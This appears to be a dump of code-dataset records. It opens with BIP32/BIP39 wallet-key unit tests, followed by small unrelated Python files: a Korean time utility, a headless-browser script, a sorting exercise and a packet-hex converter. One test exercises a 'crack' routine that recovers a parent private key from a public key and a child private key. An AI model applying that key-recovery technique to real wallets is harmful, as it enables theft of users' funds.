b\"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13\")\n xprv = rootxprv\n xpub = rootxpub\n\n xprv = bip32.derive(xprv, \".\") # private relative\n self.assertEqual(\n xprv, b\"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6\")\n xprv = bip32.derive(rootxprv, \"m\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6\")\n xpub = bip32.derive(xpub, \".\") # public relative\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13\")\n xpub = bip32.derive(rootxpub, \"m\") # public absolute\n self.assertEqual(\n xpub, b\"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13\")\n\n xprv = bip32.derive(xprv, \"./0'\") # private relative\n self.assertEqual(\n xprv, b\"xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L\")\n xprv = bip32.derive(rootxprv, \"m/0'\") # private absolute\n self.assertEqual(\n xprv, b\"xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L\")\n xpub = bip32.xpub_from_xprv(xprv) # neutering\n self.assertEqual(\n xpub, b\"xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y\")\n\n def test_bip39_vectors(self):\n \"\"\"BIP32 test vectors from BIP39\n https://github.com/bitcoin/bips/blob/master/bip-0039.mediawiki\n \"\"\"\n filename = \"bip39_test_vectors.json\"\n path_to_filename = os.path.join(os.path.dirname(__file__),\n \"./data/\",\n filename)\n with open(path_to_filename, 'r') as f:\n test_vectors = json.load(f)[\"english\"]\n f.closed\n xkey_version = bip32.PRV_VERSION[0]\n for test_vector in test_vectors:\n seed = test_vector[2]\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version)\n self.assertEqual(rootxprv.decode(), test_vector[3])\n\n def test_version(self):\n pass\n\n def test_mainnet(self):\n # bitcoin core derivation style\n rootxprv = b'xprv9s21ZrQH143K2ZP8tyNiUtgoezZosUkw9hhir2JFzDhcUWKz8qFYk3cxdgSFoCMzt8E2Ubi1nXw71TLhwgCfzqFHfM5Snv4zboSebePRmLS'\n\n # m/0'/0'/463'\n addr1 = b'1DyfBWxhVLmrJ7keyiHeMbt7N3UdeGU4G5'\n indexes = [0x80000000, 0x80000000, 0x80000000 + 463]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(rootxprv, indexes)))\n self.assertEqual(addr, addr1)\n path = \"m/0'/0'/463'\"\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(rootxprv, path)))\n self.assertEqual(addr, addr1)\n\n # m/0'/0'/267'\n addr2 = b'11x2mn59Qy43DjisZWQGRResjyQmgthki'\n indexes = [0x80000000, 0x80000000, 0x80000000 + 267]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(rootxprv, indexes)))\n self.assertEqual(addr, addr2)\n path = \"m/0'/0'/267'\"\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(rootxprv, path)))\n self.assertEqual(addr, addr2)\n\n xkey_version = bip32.PRV_VERSION[0]\n seed = \"bfc4cbaad0ff131aa97fa30a48d09ae7df914bcc083af1e07793cd0a7c61a03f65d622848209ad3366a419f4718a80ec9037df107d8d12c19b83202de00a40ad\"\n seed = bytes.fromhex(seed)\n xprv = bip32.rootxprv_from_seed(seed, xkey_version)\n xpub = b'xpub661MyMwAqRbcFMYjmw8C6dJV97a4oLss6hb3v9wTQn2X48msQB61RCaLGtNhzgPCWPaJu7SvuB9EBSFCL43kTaFJC3owdaMka85uS154cEh'\n self.assertEqual(bip32.xpub_from_xprv(xprv), xpub)\n\n ind = [0, 0]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'1FcfDbWwGs1PmyhMVpCAhoTfMnmSuptH6g')\n\n ind = [0, 1]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'1K5GjYkZnPFvMDTGaQHTrVnd8wjmrtfR5x')\n\n ind = [0, 2]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'1PQYX2uN7NYFd7Hq22ECMzfDcKhtrHmkfi')\n\n ind = [1, 0]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'1BvSYpojWoWUeaMLnzbkK55v42DbizCoyq')\n\n ind = [1, 1]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'1NXB59hF4QzYpFrB7o6usLBjbk2D3ZqxAL')\n\n ind = [1, 2]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(bip32.derive(xprv, ind)))\n self.assertEqual(addr, b'16NLYkKtvYhW1Jp86tbocku3gxWcvitY1w')\n\n # version/key mismatch in extended parent key\n temp = base58.decode_check(rootxprv)\n bad_xprv = base58.encode_check(temp[0:45] + b'\\x01' + temp[46:])\n self.assertRaises(ValueError, bip32.ckd, bad_xprv, 1)\n #bip32.ckd(bad_xprv, 1)\n\n # version/key mismatch in extended parent key\n xpub = bip32.xpub_from_xprv(rootxprv)\n temp = base58.decode_check(xpub)\n bad_xpub = base58.encode_check(temp[0:45] + b'\\x00' + temp[46:])\n self.assertRaises(ValueError, bip32.ckd, bad_xpub, 1)\n #bip32.ckd(bad_xpub, 1)\n\n # no private/hardened derivation from pubkey\n self.assertRaises(ValueError, bip32.ckd, xpub, 0x80000000)\n #bip32.ckd(xpub, 0x80000000)\n\n def test_testnet(self):\n # bitcoin core derivation style\n rootxprv = b'tprv8ZgxMBicQKsPe3g3HwF9xxTLiyc5tNyEtjhBBAk29YA3MTQUqULrmg7aj9qTKNfieuu2HryQ6tGVHse9x7ANFGs3f4HgypMc5nSSoxwf7TK'\n\n # m/0'/0'/51'\n addr1 = b'mfXYCCsvWPgeCv8ZYGqcubpNLYy5nYHbbj'\n indexes = [0x80000000, 0x80000000, 0x80000000 + 51]\n addr = bip32.p2pkh_address_from_xpub(\n bip32.xpub_from_xprv(bip32.derive(rootxprv, indexes)))\n self.assertEqual(addr, addr1)\n path = \"m/0'/0'/51'\"\n addr = bip32.p2pkh_address_from_xpub(\n bip32.xpub_from_xprv(bip32.derive(rootxprv, path)))\n self.assertEqual(addr, addr1)\n\n # m/0'/1'/150'\n addr2 = b'mfaUnRFxVvf55uD1P3zWXpprN1EJcKcGrb'\n indexes = [0x80000000, 0x80000000 + 1, 0x80000000 + 150]\n addr = bip32.p2pkh_address_from_xpub(\n bip32.xpub_from_xprv(bip32.derive(rootxprv, indexes)))\n self.assertEqual(addr, addr2)\n path = \"m/0'/1'/150'\"\n addr = bip32.p2pkh_address_from_xpub(\n bip32.xpub_from_xprv(bip32.derive(rootxprv, path)))\n self.assertEqual(addr, addr2)\n\n def test_altnet(self):\n # non-bitcoin address version\n addr_version = 0x46.to_bytes(1, 'big')\n\n rootxprv = b'xprv9s21ZrQH143K2oxHiQ5f7D7WYgXD9h6HAXDBuMoozDGGiYHWsq7TLBj2yvGuHTLSPCaFmUyN1v3fJRiY2A4YuNSrqQMPVLZKt76goL6LP7L'\n\n # m/0'/0'/5'\n receive = b'VUqyLGVdUADWEqDqL2DeUBAcbPQwZfWDDY'\n indexes = [0x80000000, 0x80000000, 0x80000005]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, indexes)), addr_version)\n self.assertEqual(addr, receive)\n path = \"m/0'/0'/5'\"\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, path)), addr_version)\n self.assertEqual(addr, receive)\n\n # m/0'/1'/1'\n change = b'VMg6DpX7SQUsoECdpXJ8Bv6R7p11PfwHwy'\n indexes = [0x80000000, 0x80000001, 0x80000001]\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, indexes)), addr_version)\n self.assertEqual(addr, change)\n path = \"m/0'/1'/1'\"\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, path)), addr_version)\n self.assertEqual(addr, change)\n\n xkey_version = bip32.PRV_VERSION[0]\n seed = \"5b56c417303faa3fcba7e57400e120a0ca83ec5a4fc9ffba757fbe63fbd77a89a1a3be4c67196f57c39a88b76373733891bfaba16ed27a813ceed498804c0570\"\n rootxprv = bip32.rootxprv_from_seed(seed, xkey_version)\n self.assertEqual(rootxprv, b'xprv9s21ZrQH143K3t4UZrNgeA3w861fwjYLaGwmPtQyPMmzshV2owVpfBSd2Q7YsHZ9j6i6ddYjb5PLtUdMZn8LhvuCVhGcQntq5rn7JVMqnie')\n\n indexes = [0x80000000, 0, 0] # receive\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, indexes)), addr_version)\n self.assertEqual(addr, b'VTpEhLjvGYE16pLcNrMY53gQB9bbhn581W')\n\n indexes = [0x80000000, 1, 0] # change\n addr = bip32.p2pkh_address_from_xpub(bip32.xpub_from_xprv(\n bip32.derive(rootxprv, indexes)), addr_version)\n self.assertEqual(addr, b'VRtaZvAe4s29aB3vuXyq7GYEpahsQet2B1')\n\n def test_exceptions(self):\n xprv = b'xppp9s21ZrQH143K2oxHiQ5f7D7WYgXD9h6HAXDBuMoozDGGiYHWsq7TLBj2yvGuHTLSPCaFmUyN1v3fJRiY2A4YuNSrqQMPVLZKt76goL6LP7L'\n\n self.assertRaises(ValueError, bip32.ckd, xprv, 'invalid index')\n self.assertRaises(ValueError, bip32.ckd, xprv, 0x80000000)\n self.assertRaises(ValueError, bip32.ckd, xprv, \"800000\")\n self.assertRaises(ValueError, bip32.derive, xprv, '/1')\n self.assertRaises(TypeError, bip32.derive, xprv, 1)\n xprv = b'xprv9s21ZrQH143K2oxHiQ5f7D7WYgXD9h6HAXDBuMoozDGGiYHWsq7TLBj2yvGuHTLSPCaFmUyN1v3fJRiY2A4YuNSrqQMPVLZKt76goL6LP7L'\n self.assertRaises(ValueError, bip32.child_index, xprv)\n\n version = b'\\x04\\x88\\xAD\\xE5' # invalid version\n xkey = version + b'\\x00'*74\n xkey = base58.encode_check(xkey)\n self.assertRaises(ValueError, bip32.ckd, xkey, 0x80000000)\n\n # invalid private version\n version = b'\\x04\\x88\\xAD\\xE5'\n seed = \"5b56c417303faa3fcba7e57400e120a0ca83ec5a4fc9ffba757fbe63fbd77a89a1a3be4c67196f57c39a88b76373733891bfaba16ed27a813ceed498804c0570\"\n self.assertRaises(ValueError, bip32.rootxprv_from_seed, seed, version)\n #bip32.rootxprv_from_seed(seed, version)\n\n # extended key is not a private one\n xpub = b'xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy'\n self.assertRaises(ValueError, bip32.xpub_from_xprv, xpub)\n #bip32.xpub_from_xprv(xpub)\n\n # Absolute derivation path for non-master key\n self.assertRaises(ValueError, bip32.derive, xpub, \"m/44'/0'/1'/0/10\")\n #bip32.derive(xpub, \"m/0/1\")\n\n # extended key is not a public one\n self.assertRaises(ValueError, bip32.p2pkh_address_from_xpub, xprv)\n #bip32.p2pkh_address_from_xpub(xprv)\n\n def test_crack(self):\n parent_xpub = b'xpub6BabMgRo8rKHfpAb8waRM5vj2AneD4kDMsJhm7jpBDHSJvrFAjHJHU5hM43YgsuJVUVHWacAcTsgnyRptfMdMP8b28LYfqGocGdKCFjhQMV'\n child_xprv = b'xprv9xkG88dGyiurKbVbPH1kjdYrA8poBBBXa53RKuRGJXyruuoJUDd8e4m6poiz7rV8Z4NoM5AJNcPHN6aj8wRFt5CWvF8VPfQCrDUcLU5tcTm'\n parent_xprv = bip32.crack(parent_xpub, child_xprv)\n self.assertEqual(bip32.xpub_from_xprv(parent_xprv), parent_xpub)\n index = bip32.child_index(child_xprv)\n self.assertEqual(bip32.ckd(parent_xprv, index), child_xprv)\n path = [index]\n self.assertEqual(bip32.derive(parent_xprv, path), child_xprv)\n\n # extended parent key is not a public one\n self.assertRaises(ValueError, bip32.crack, parent_xprv, child_xprv)\n #bip32.crack(parent_xprv, child_xprv)\n\n # extended child key is not a private one\n self.assertRaises(ValueError, bip32.crack, parent_xpub, parent_xpub)\n #bip32.crack(parent_xpub, parent_xpub)\n\n # wrong child/parent depth relation\n child_xpub = bip32.xpub_from_xprv(child_xprv)\n self.assertRaises(ValueError, bip32.crack, child_xpub, child_xprv)\n #bip32.crack(child_xpub, child_xprv)\n\n # not a child for the provided parent\n child0_xprv = bip32.ckd(parent_xprv, 0)\n grandchild_xprv = bip32.ckd(child0_xprv, 0)\n self.assertRaises(ValueError, bip32.crack, child_xpub, grandchild_xprv)\n #bip32.crack(child_xpub, grandchild_xprv)\n\n # hardened derivation\n hardened_child_xprv = bip32.ckd(parent_xprv, 0x80000000)\n self.assertRaises(ValueError, bip32.crack, parent_xpub, hardened_child_xprv)\n #bip32.crack(parent_xpub, hardened_child_xprv)\n\n def test_versions(self):\n\n # data cross-checked with Electrum and https://jlopp.github.io/xpub-converter/\n\n # 128 bits\n raw_entr = bytes.fromhex('6'*32)\n # 12 words\n mnemonic = bip39.mnemonic_from_entropy(raw_entr, 'en')\n seed = bip39.seed_from_mnemonic(mnemonic, '')\n\n ##### TESTNET\n\n # p2pkh BIP44 m / 44' / coin_type' / account' / change / address_index\n path = \"m/44h/1h/0h\"\n version = bip32.TEST_tprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'tpubDChqWo2Xi2wNsxyJBE8ipcTJHLKWcqeeNUKBVTpUCNPZkHzHTm3qKAeHqgCou1t8PAY5ZnJ9QDa6zXSZxmjDnhiBpgZ7f6Yv88wEm5HXVbm'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'moutHSzeFWViMNEcvBxKzNCMj2kca8MvE1'\n self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'myWcXdNais9ExumnGKnNoJwoihQKfNPG9i'\n self.assertEqual(address, exp_address)\n\n # legacy segwit (p2wpkh-p2sh) m / 49'/ coin_type' / account' / change / address_index\n path = \"m/49h/1h/0h\"\n version = bip32.TEST_uprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'upub5Dj8j7YrwodV68mt58QmNpSzjqjso2WMXEpLGLSvskKccGuXhCh3dTedkzVLAePA617UyXAg2vdswJXTYjU4qjMJaHU79GJVVJCAiy9ezZ2'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n # TODO: address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'2Mw8tQ6uT6mHhybarVhjgomUhHQJTeV9A2c'\n # TODO: self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n # TODO: address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'2N872CRJ3E1CzWjfixXr3aeC3hkF5Cz4kWb'\n # TODO: self.assertEqual(address, exp_address)\n\n # multi-sig version\n version = bip32.TEST_Uprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'Upub5QdDrMHJWmBrWhwG1nskCtnoTdn91PBwqWU1BbiUFXA2ETUSTc5KiaWZZhSoj5c4KUBTr7Anv92P4U9Dqxd1zDTyQkaWYfmVP2U3Js1W5cG'\n self.assertEqual(xpub, exp)\n\n # native segwit (p2wpkh) m / 84'/ coin_type' / account' / change / address_index\n path = \"m/84h/1h/0h\"\n version = bip32.TEST_vprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'vpub5ZhJmduYY7M5J2qCJgSW7hunX6zJrr5WuNg2kKt321HseZEYxqJc6Zso47aNXQw3Wf3sA8kppbfsxnLheUNXcL3xhzeBHLNp8fTVBN6DnJF'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n # FIXME: address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'bcrt1qv8lcnmj09rpdqwgl025h2deygur64z4hqf7me5'\n # FIXME: self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n # FIXME: address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'bcrt1qqhxvky4y6qkwpvdzqjkdafmj20vs5trmt6y8w5'\n # FIXME: self.assertEqual(address, exp_address)\n\n # multi-sig version\n version = bip32.TEST_Vprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'Vpub5kbPtsdz74uSibzaFLuUwnFbEu2a5Cm7DeKhfb9aPn8HGjoTjEgtBgjirpXr5r9wk87r2ikwhp4P5wxTwhXUkpAdYTkagjqp2PjMmGPBESU'\n self.assertEqual(xpub, exp)\n\n ##### MAINNET\n\n # p2pkh BIP44 m / 44' / coin_type' / account' / change / address_index\n path = \"m/44h/0h/0h\"\n version = bip32.MAIN_xprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'xpub6C3uWu5Go5q62JzJpbjyCLYRGLYvexFeiepZTsYZ6SRexARkNfjG7GKtQVuGR3KHsyKsAwv7Hz3iNucPp6pfHiLvBczyK1j5CtBtpHB3NKx'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'1DDKKVHoFWGfctyEEJvrusqq6ipEaieGCq'\n self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'1FhKoffreKHzhtBMVW9NSsg3ZF148JPGoR'\n self.assertEqual(address, exp_address)\n\n # legacy segwit (p2wpkh-p2sh) m / 49'/ coin_type' / account' / change / address_index\n path = \"m/49h/0h/0h\"\n version = bip32.MAIN_yprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'ypub6YBGdYufCVeoPVmNXfdrWhaBCXsQoLKNetNmD9bPTrKmnKVmiyU8f1uJqwGdmBb8kbAZpHoYfXQTLbWpkXc4skQDAreeCUXdbX9k8vtiHsN'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n # FIXME: address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'3FmNAiTCWe5kPMgc4dtSgEdY8VuaCiJEH8'\n # FIXME: self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n # FIXME: address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'34FLgkoRYX5Q5fqiZCZDwsK5GpXxmFuLJN'\n # FIXME: self.assertEqual(address, exp_address)\n\n # multi-sig version\n version = bip32.MAIN_Yprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'Ypub6j5Mkne6mTDAp4vkUL6qLmuyvKug1gzxyA2S8QrvqdABQW4gVNrQk8mEeeE7Kcp2z4EYgsofYjnxTm8b3km22EWt1Km3bszdVFRcipc6rXu'\n self.assertEqual(xpub, exp)\n\n # native segwit (p2wpkh) m / 84'/ coin_type' / account' / change / address_index\n path = \"m/84h/0h/0h\"\n version = bip32.MAIN_zprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'zpub6qg3Uc1BAQkQvcBUYMmZHSzbsshSon3FvJ8yvH3ZZMjFNvJkwSji8UUwghiF3wvpvSvcNWVP8kfUhc2V2RwGp6pTC3ouj6njj956f26TniN'\n self.assertEqual(xpub, exp)\n # first addresses\n xpub_ext = bip32.derive(xpub, \"./0/0\") # external\n # FIXME: address = bip32.p2pkh_address_from_xpub(xpub_ext)\n exp_address = b'bc1q0hy024867ednvuhy9en4dggflt5w9unw4ztl5a'\n # FIXME: self.assertEqual(address, exp_address)\n xpub_int = bip32.derive(xpub, \"./1/0\") # internal\n # FIXME: address = bip32.p2pkh_address_from_xpub(xpub_int)\n exp_address = b'bc1qy4x03jyl88h2zeg7l287xhv2xrwk4c3ztfpjd2'\n # FIXME: self.assertEqual(address, exp_address)\n\n # multi-sig version\n version = bip32.MAIN_Zprv\n rootprv = bip32.rootxprv_from_seed(seed, version)\n xprv = bip32.derive(rootprv, path)\n xpub = bip32.xpub_from_xprv(xprv)\n exp = b'Zpub72a8bqjcjNJnMBLrV2EY7XLQbfji28irEZneqYK6w8Zf16sfhr7zDbLsVQficP9j9uzbF6VW1y3ypmeFKf6Dxaw82WvK8WFjcsLyEvMNZjF'\n self.assertEqual(xpub, exp)\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n unittest.main()\n","sub_path":"tests/test_bip32.py","file_name":"test_bip32.py","file_ext":"py","file_size_in_byte":33952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"412926027","text":"import datetime\nfrom pytz import timezone\nfrom dateutil.relativedelta import relativedelta\n\n\ndef get_kst():\n \"\"\"\n 어떤 환경에서든지 항상 한국 시간을 가져오고 싶을 때 사용할 수 있습니다.\n\n **Example**\n\n ```\n import simple_utils\n print(simple_utils.time.get_kst()\n ```\n\n **Returns**\n\n * **한국시간** (*datetime.datetime*) --\n \"\"\"\n return datetime.datetime.now(timezone('Asia/Seoul'))\n\ndef get_kst_ymd():\n \"\"\"\n ��떤 환경에서든지 항상 한국 시간의 %Y-%m-%d을 가져오고 싶을 때 사용할 수 있습니다.\n\n **Example**\n\n ```\n import simple_utils\n print(simple_utils.time.get_kst_ymd()\n ```\n\n **Returns**\nc\n * **한국시간 %Y-%m-%d** (*str*) --\n \"\"\" \n return get_kst().strftime('%Y-%m-%d')\n \ndef get_month_dt_list(start_dt, last_dt=None, format=None):\n \"\"\"\n 날짜 사이의 날짜들을 월로 구분하여 가져옵니다.\n\n **Example**\n\n ```\n import simple_utils\n from datetime import datetime\n print(simple_utils.time.get_month_dt_list(datetime(2015, 1))\n ```\n\n **Parameters**\n\n * **[REQUIRED] start_dt** (*datetime.datetime*) --\n \n 시작할 날짜입니다.\n \n * **last_dt** (*datetime.datetime*) --\n \n *Default: None*\n\n 종료할 날짜입니다.\n\n * **format** (*str*) --\n \n *Default: None*\n\n strftime으로 스트링으로 변환하려면 아래의 매개변수를 입력하세요.\n\n **Returns**\n\n * **datetime list** (*list*) --\n \"\"\" \n dt = datetime.datetime(start_dt.year, start_dt.month, 1)\n if not last_dt:\n now = datetime.datetime.now()\n last_dt = datetime.datetime(now.year, now.month, 1)\n else:\n last_dt = datetime.datetime(last_dt.year, last_dt.month, 1)\n \n\n dt_list = []\n while dt <= last_dt:\n dt_list.append(dt)\n dt += relativedelta(months=1)\n\n if format:\n return [dt.strftime(format) for dt in dt_list]\n \n return dt_list\n\ndef get_seconds_by_unit(str_time):\n \"\"\"\n 24h, 30m, 10s 같은 간단한 스트링 타입의 문자열을 int형의 초 단위로 변환해줍니다.\n\n **Example**\n\n ```\n import simple_utils\n print(simple_utils.time.get_seconds_by_unit('24h'))\n ```\n\n **Parameters**\n\n * **[REQUIRED] str_time** (*str*) --\n\n 스트링 타입의 시간 문자열입니다. 아래와 같은 방식으로 입력할 수 있습니다.\n \n - 24h: 24시간\n - 30m: 30분\n - 10s: 10초\n \n **Returns**\n\n * **seconds** (*int*) -- \n \"\"\"\n unit = str_time[-1]\n num = int(str_time[:-1])\n seconds = -1\n if unit == 'h':\n seconds = num * 60 * 60\n elif unit == 'm':\n seconds = num * 60\n elif unit == 's':\n seconds = num\n else:\n raise ValueError(f'invalid unit {unit}')\n \n return seconds\n","sub_path":"simple_utils/simple_time.py","file_name":"simple_time.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"399030810","text":"#!/usr/bin/env python\n\nfrom pyvirtualdisplay import Display\nfrom selenium import webdriver\n\ndisplay = Display(visible=0, size=(1024, 768))\ndisplay.start()\n\nbrowser = webdriver.Firefox()\nbrowser.get('http://www.ubuntu.com/')\nprint (browser.page_source)\n\nbrowser.close()\ndisplay.stop()","sub_path":"pocs/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"371720246","text":"class Solution:\n\n ## SOLUTION 1:\n def threeNumberSort1(self, array, order):\n ## Time O(3n) [order is constant with len. of 3] || Space O(1)\n if not order:\n return array\n\n leftPtr = 0\n for orderedNum in order:\n rightPtr = leftPtr + 1\n while rightPtr < len(array):\n if array[leftPtr] == orderedNum:\n leftPtr += 1\n rightPtr += 1\n elif array[leftPtr] != orderedNum and array[rightPtr] == orderedNum:\n array[leftPtr], array[rightPtr] = array[rightPtr], array[leftPtr]\n leftPtr += 1\n rightPtr += 1\n else:\n rightPtr += 1\n return array\n\n ## SOLUTION 2:\n def threeNumberSort2(self, array, order):\n # Time O(n) || Space O(1)\n if len(order) < 3 or not order:\n return array\n\n firstValue = order[0]\n thirdValue = order[2]\n\n firstIdx = 0\n for idx in range(len(array)):\n if array[idx] == firstValue:\n array[idx], array[firstIdx] = array[firstIdx], array[idx]\n firstIdx += 1\n\n thirdIdx = len(array) - 1\n for idx in reversed(range(len(array))):\n if array[idx] == thirdValue:\n array[idx], array[thirdIdx] = array[thirdIdx], array[idx]\n thirdIdx -= 1\n\n return array\n\n\nif __name__ == \"__main__\":\n\n print(Solution().threeNumberSort1([1, 0, 0, -1, -1, 0, 1, 1], [0, 1, -1]))\n print(Solution().threeNumberSort2([1, 0, 0, -1, -1, 0, 1, 1], [-1, 0, 1]))\n","sub_path":"Medium/threeNumberSortBasedOnOrder.py","file_name":"threeNumberSortBasedOnOrder.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"475136646","text":"\nimport argparse\n\n_meta_shell_command = 'k12'\n\n\ndef lineToASCII(line):\n \n #print(line[0:2])\n if line[0:2] == '|0':\n line = line[2:].strip(' |\\r\\n')\n else:\n return None\n \n lhex = line.split('|')\n \n lascii = []\n nhex = -1\n for hx in lhex:\n nhex += 1\n \n # Cut all bytes before the 42th (UDP).\n #if nhex < 42:\n # continue\n \n i = int(hx, 16)\n \n if i < 32 or i > 126:\n i = ord('_')\n \n lascii.append( chr(i) )\n \n #print(lascii)\n \n return \"\".join(lascii)\n \n\nif __name__ == '__main__':\n \n print('begin')\n \n parser = argparse.ArgumentParser()\n parser.add_argument('filein', nargs='+')\n args = parser.parse_args()\n \n file_in = args.filein[0]\n \n fh = open(file_in, 'r')\n lines = fh.readlines()\n fh.close()\n \n allPayloads = []\n i = 0\n for line in lines:\n \n try:\n lineo = lineToASCII(line)\n \n if lineo is not None:\n allPayloads.append(lineo)\n except Exception as e:\n print('Failed line %s: %s. E: %s.' % (i, line, e))\n \n i += 1\n \n fh = open(file_in + '.k12bytes.txt', 'w')\n fh.write(\"\\n\".join(allPayloads))\n fh.close()\n \n print('end')\n ","sub_path":"shell_ext/meh/k12_to_udp.py","file_name":"k12_to_udp.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"394132424","text":"from 